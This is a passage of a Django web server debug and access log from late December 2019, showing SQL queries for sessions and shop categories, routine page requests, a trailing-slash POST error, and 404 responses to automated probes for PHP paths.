SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'g4nj40qy41bjexs5n4knp9wfke9rfynf' LIMIT 1; args=('g4nj40qy41bjexs5n4knp9wfke9rfynf',) DEBUG 2019-12-23 07:00:20,773 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('g4nj40qy41bjexs5n4knp9wfke9rfynf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T07:00:20.772483+00:00'::timestamptz); args=('g4nj40qy41bjexs5n4knp9wfke9rfynf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 7, 0, 20, 772483, tzinfo=)) [23/Dec/2019 07:00:20] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 07:02:45] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 07:10:13] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:15:15] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:20:18] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:22:38] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:29:17] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:34:19] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:39:21] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:44:24] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:50:26] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:55:28] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:00:55] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:07:14] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:13:22] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:18:29] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:26:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:34:29] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:39:32] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:45:24] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:50:27] "GET / HTTP/1.0" 302 0 [23/Dec/2019 08:56:12] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:10:05] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 09:18:03] "GET /robots.txt HTTP/1.0" 404 6450 [23/Dec/2019 09:18:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 09:18:04,275 utils 4252 140031732287232 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't0aajdfrcyikdo46c9jturz06z8pq24c' LIMIT 1; args=('t0aajdfrcyikdo46c9jturz06z8pq24c',) DEBUG 2019-12-23 09:18:04,278 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t0aajdfrcyikdo46c9jturz06z8pq24c', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T09:18:04.276336+00:00'::timestamptz); args=('t0aajdfrcyikdo46c9jturz06z8pq24c', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 9, 18, 4, 276336, tzinfo=)) [23/Dec/2019 09:18:04] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 09:19:18] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:24:21] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:29:23] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 09:34:26] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:40:06] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:45:09] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:47:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 09:47:31] "GET /robots.txt HTTP/1.0" 404 6451 [23/Dec/2019 09:47:31] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 09:47:31,635 utils 4252 140031732287232 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0g2q6sscki2g1xvzfm07ds8jpnpkkbej' LIMIT 1; args=('0g2q6sscki2g1xvzfm07ds8jpnpkkbej',) DEBUG 2019-12-23 09:47:31,637 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0g2q6sscki2g1xvzfm07ds8jpnpkkbej', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T09:47:31.635520+00:00'::timestamptz); args=('0g2q6sscki2g1xvzfm07ds8jpnpkkbej', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 9, 47, 31, 635520, tzinfo=)) [23/Dec/2019 09:47:31] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /sitemap.xml [23/Dec/2019 09:47:53] "GET /sitemap.xml HTTP/1.0" 404 6454 [23/Dec/2019 09:50:12] "GET / HTTP/1.0" 302 0 [23/Dec/2019 09:55:14] "GET / HTTP/1.0" 302 0 [23/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [23/Dec/2019 10:11:50] "POST /editBlackAndWhiteList HTTP/1.0" 500 63902 [23/Dec/2019 10:12:36] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [23/Dec/2019 10:13:37] "GET /proxy.php HTTP/1.0" 404 6454 Not Found: /favicon.ico [23/Dec/2019 10:21:03] "GET /favicon.ico HTTP/1.0" 404 6454 [23/Dec/2019 10:22:29] "GET / HTTP/1.0" 302 0 [23/Dec/2019 10:27:32] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 10:28:04] "GET /robots.txt HTTP/1.0" 404 6451 [23/Dec/2019 10:28:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 10:28:06,285 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jmiacz1zjk7i5ft3hymmefzuhkb64wd2' LIMIT 1; args=('jmiacz1zjk7i5ft3hymmefzuhkb64wd2',) DEBUG 2019-12-23 10:28:06,286 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jmiacz1zjk7i5ft3hymmefzuhkb64wd2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T10:28:06.285626+00:00'::timestamptz); args=('jmiacz1zjk7i5ft3hymmefzuhkb64wd2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 10, 28, 6, 285626, tzinfo=)) [23/Dec/2019 10:28:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 10:32:34] "GET / HTTP/1.0" 302 0 [23/Dec/2019 10:37:37] "GET / HTTP/1.0" 302 0 [23/Dec/2019 10:43:29] "GET / HTTP/1.0" 302 0 [23/Dec/2019 10:48:31] "GET / HTTP/1.0" 302 0 [23/Dec/2019 10:53:34] "GET / HTTP/1.0" 302 0 [23/Dec/2019 10:58:37] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:15:08] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:20:40] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 11:21:07] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [23/Dec/2019 11:21:09] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=192 HTTP/1.0" 404 6532 Not Found: /newslist.asp [23/Dec/2019 11:21:12] "GET /newslist.asp?type=4&id=1357 HTTP/1.0" 404 6476 [23/Dec/2019 11:25:43] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:30:45] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:34:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 11:34:31,322 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'szylaj5whthtyhc6s04dve6dqmt108ay' LIMIT 1; args=('szylaj5whthtyhc6s04dve6dqmt108ay',) DEBUG 2019-12-23 11:34:31,324 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('szylaj5whthtyhc6s04dve6dqmt108ay', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T11:34:31.322704+00:00'::timestamptz); args=('szylaj5whthtyhc6s04dve6dqmt108ay', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 11, 34, 31, 322704, tzinfo=)) [23/Dec/2019 11:34:31] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 11:37:28] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:46:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:47:15] "GET / HTTP/1.0" 302 0 [23/Dec/2019 11:52:18] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:00:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:10:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:15:42] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:20:45] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:28:12] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:33:15] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:38:18] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:43:20] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:49:23] "GET / HTTP/1.0" 302 0 [23/Dec/2019 12:56:13] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 13:04:36] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:10:04] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:15:07] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:20:09] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:25:12] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 13:31:14] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:36:17] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 13:41:20] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:46:22] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:52:26] "GET / HTTP/1.0" 302 0 [23/Dec/2019 13:57:28] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:13:14] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:18:17] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:23:20] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:27:41] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:28:23] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:34:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:39:04] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:44:07] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:49:09] "GET / HTTP/1.0" 302 0 [23/Dec/2019 14:54:43] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [23/Dec/2019 14:57:20] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [23/Dec/2019 14:57:20] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [23/Dec/2019 14:57:21] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [23/Dec/2019 14:57:21] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [23/Dec/2019 14:57:21] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [23/Dec/2019 14:57:21] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [23/Dec/2019 14:57:21] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [23/Dec/2019 14:57:21] "GET /index.php HTTP/1.0" 404 6447 [23/Dec/2019 14:57:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 14:57:22,257 utils 4252 140031732287232 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ak3jz8o8r8b7ar2qr5i9c245okai7yxt' LIMIT 1; args=('ak3jz8o8r8b7ar2qr5i9c245okai7yxt',) DEBUG 2019-12-23 14:57:22,259 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ak3jz8o8r8b7ar2qr5i9c245okai7yxt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T14:57:22.258135+00:00'::timestamptz); args=('ak3jz8o8r8b7ar2qr5i9c245okai7yxt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 14, 57, 22, 258135, tzinfo=)) [23/Dec/2019 14:57:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 14:59:59] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:10:06] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 15:15:41] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:20:44] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:25:46] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:30:50] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:36:12] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:41:15] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:49:16] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 15:54:30] "GET / HTTP/1.0" 302 0 [23/Dec/2019 15:59:33] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:01:35] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:01:38] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:01:41] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:10:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:19:48] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:24:50] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:29:53] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:34:56] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 16:38:45] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:44:11] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:49:14] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:54:16] "GET / HTTP/1.0" 302 0 [23/Dec/2019 16:55:12] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:00:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:17:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:22:36] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 17:27:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:36:55] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:42:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:47:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:52:06] "GET / HTTP/1.0" 302 0 [23/Dec/2019 17:57:09] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:25:16] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:30:47] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 18:33:51,680 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-23 18:33:51,687 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-23 18:33:51,691 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-23 18:33:51,694 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-23 18:33:51,699 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-23 18:33:51,701 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-23 18:33:51,704 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-23 18:33:51,708 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-23 18:33:51,710 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-23 18:33:51,714 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-23 18:33:51,717 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-23 18:33:51,719 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-23 18:33:51,722 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-23 18:33:51,725 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-23 18:33:51,729 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-23 18:33:51,731 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-23 18:33:51,734 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-23 18:33:51,736 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-23 18:33:51,738 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-23 18:33:51,742 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-23 18:33:51,745 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-23 18:33:51,749 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-23 18:33:51,753 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-23 18:33:51,756 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-23 18:33:51,761 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 